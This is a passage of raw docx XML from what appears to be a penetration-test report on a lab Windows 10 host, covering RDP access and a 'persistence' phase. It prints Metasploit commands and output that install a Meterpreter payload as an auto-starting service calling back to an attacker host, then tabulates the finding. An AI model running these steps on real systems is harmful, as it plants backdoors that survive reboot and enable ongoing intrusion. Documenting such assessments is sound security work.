            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-94: Improper Control of Code Generation (Code Injection)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A7A5E"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">4.6  RDP Visual Access Verified</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Using the Remmina Remote Desktop Client on the attacker system, full graphical access to the compromised Windows 10 desktop was confirmed over RDP at 192.168.40.140, demonstrating complete interactive control of the target host.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A7A5E" w:sz="4" w:space="6"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D3B2E"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Phase 4 — Access Maintenance &amp; Persistence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A7A5E"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">5.1  Overview</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">To replicate an Advanced Persistent Threat (APT) scenario, durable access mechanisms were deployed to ensure continued control over the compromised host across reboots and session interruptions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A7A5E"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">5.2  Windows Service-Based Persistence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The exploit/windows/persistence/service Metasploit module was used to install a persistent Meterpreter payload as a Windows service, configured to auto-start on each system reboot:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9360"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
          <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
          <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
          <w:right w:val="single" w:color="1A7A5E"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msf &gt; use exploit/windows/persistence/service</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msf exploit(...) &gt; set session 1</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msf exploit(...) &gt; set LHOST 192.168.40.136</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msf exploit(...) &gt; set LPORT 4444</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msf exploit(...) &gt; exploit</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Payload written to C:\Windows\TEMP\flytjt.exe</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Meterpreter session 2 opened</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Meterpreter session 3 opened</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Meterpreter session 5 opened (persistent — survives reboot)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A7A5E"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">5.3  Persistent Session Confirmed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Multiple Meterpreter sessions were established and validated. Session 5 was confirmed active as NT AUTHORITY\SYSTEM following a simulated reboot:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9360"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
          <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
          <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
          <w:right w:val="single" w:color="1A7A5E"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msf &gt; sessions</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Id  Type           Information                           Connection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="E4F0E8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="30"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="30"/>
              <w:right w:type="dxa" w:w="180"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="102010"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  5   meterpreter x86  NT AUTHORITY\SYSTEM @ DESKTOP-AR0UM8P  192.168.40.136:4444</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1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="8B0000" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">⚠  SEVERITY: CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="D0EDE4" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D3B2E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Finding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6560"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDECEA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Reboot-surviving backdoor installed as a Windows service</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="D0EDE4" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D3B2E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Metasploit Module</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6560"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDECEA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">exploit/windows/persistence/service</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="D0EDE4" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D3B2E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Payload Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6560"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDECEA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">C:\Windows\TEMP\flytjt.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="D0EDE4" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D3B2E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Persistence Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6560"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDECEA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Windows Service (auto-start on system restart)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="D0EDE4" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D3B2E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Callback Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6560"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDECEA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.40.136:4444</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="D0EDE4" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D3B2E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Session Privilege</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6560"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDECEA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">NT AUTHORITY\SYSTEM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="D0EDE4" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D3B2E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE Reference</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6560"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDECEA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-912: Hidden Functionality / Backdoor</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A7A5E" w:sz="4" w:space="6"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D3B2E"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Vulnerability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000"/>
        <w:gridCol w:w="1000"/>
        <w:gridCol w:w="1200"/>
        <w:gridCol w:w="3800"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="360"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="0D3B2E"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3000"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="0D3B2E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="0D3B2E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="0D3B2E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
